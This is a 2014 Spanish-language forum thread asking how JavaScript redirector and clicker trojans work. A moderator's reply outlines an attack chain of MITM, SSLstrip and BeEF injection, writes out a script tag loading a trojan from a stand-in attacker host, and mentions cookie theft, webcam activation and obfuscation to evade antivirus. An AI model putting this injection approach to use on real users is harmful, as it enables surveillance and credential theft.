elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan?  (Leído 2,915 veces)
dega1980

Desconectado Desconectado

Mensajes: 106



Ver Perfil WWW
Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan?
« en: 13 Abril 2014, 14:09 pm »

He visto que en algunas webs cuando se cargan salta el escudo del antivirus,diciendo que ha detectado uno de estos archivos.

Alguien sabe que son y como funcionan,de verdad te pueden colar un virus nada mas por cargar una web?

saludos
En línea

daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan?
« Respuesta #1 en: 13 Abril 2014, 14:35 pm »

He visto que en algunas webs cuando se cargan salta el escudo del antivirus,diciendo que ha detectado uno de estos archivos.

Alguien sabe que son y como funcionan,de verdad te pueden colar un virus nada mas por cargar una web?

saludos

si se puede , es una de las razones por las que java ahora esta desactivado por defecto en los navegadores.
con respecto a los alertas decias googleando encontre:

http://www.f-secure.com/v-descs/trojan_w32_trojan-clicker.shtml
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:JS/Redirector.GZ

 como yo lo veo no es precisamente un  troyano  :P
En línea

buenas
dega1980

Desconectado Desconectado

Mensajes: 106



Ver Perfil WWW
Re: Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan?
« Respuesta #2 en: 13 Abril 2014, 15:24 pm »

si se puede , es una de las razones por las que java ahora esta desactivado por defecto en los navegadores.
con respecto a los alertas decias googleando encontre:

http://www.f-secure.com/v-descs/trojan_w32_trojan-clicker.shtml
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:JS/Redirector.GZ

 como yo lo veo no es precisamente un  troyano  :P


si las alertas si que las vi hay informacion que dice que es un troyano como protegerse,lo que quiero entender es como funciona.
un saludo  :huh:
En línea

.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan?
« Respuesta #3 en: 13 Abril 2014, 19:34 pm »

Si mal no me equivoco es un troyano en javascript, la idea es combinarlo con un MITM + SSLSTRIP + inyección de código + Beef XSS (especie de troyano en javascript) o de forma alternativa ser dueño de una web popular o desfacear una y agregar el javascript de Beef XSS, la idea es así:
- El usuario ingresa a una página
- A través de MITM + SSLSTRIP toda página aun HTTPS se agrega un código:
<script type=java/script src=http://hackerweb.com/trojan.js> (no recuerdo bien)
- Este troyano, detecta el navegador, sistema operativo, permite agregar un iframe, activar la webcam a través de adobeflash player, stealer cookie, etc.
Lo bueno es que al ser javascript la ofuscación es fácil de hacer lo cual facilitaría el bypass de AV, desconozco si se realiza un análisis heurístico a javascript
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines